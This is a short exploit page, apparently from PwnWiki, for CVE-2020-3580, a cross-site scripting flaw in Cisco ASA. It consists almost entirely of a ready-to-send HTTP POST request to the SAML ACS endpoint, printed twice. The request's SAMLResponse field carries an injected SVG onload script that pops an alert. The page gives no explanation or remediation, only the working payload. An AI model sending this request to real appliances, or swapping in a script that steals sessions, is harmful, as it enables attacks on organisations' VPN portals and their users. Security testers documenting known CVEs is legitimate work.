CVE-2020-3580 Cisco ASA XSS漏洞
From PwnWiki
XSS
POST /+CSCOE+/saml/sp/acs?tgname=a HTTP/1.1
Host: ciscoASA.local
Content-Type: application/x-www-form-urlencoded
Content-Length: 44
SAMLResponse="><svg/onload=alert('PTSwarm')>
POST /+CSCOE+/saml/sp/acs?tgname=a HTTP/1.1
Host: ciscoASA.local
Content-Type: application/x-www-form-urlencoded
Content-Length: 44
SAMLResponse="><svg/onload=alert('PTSwarm')>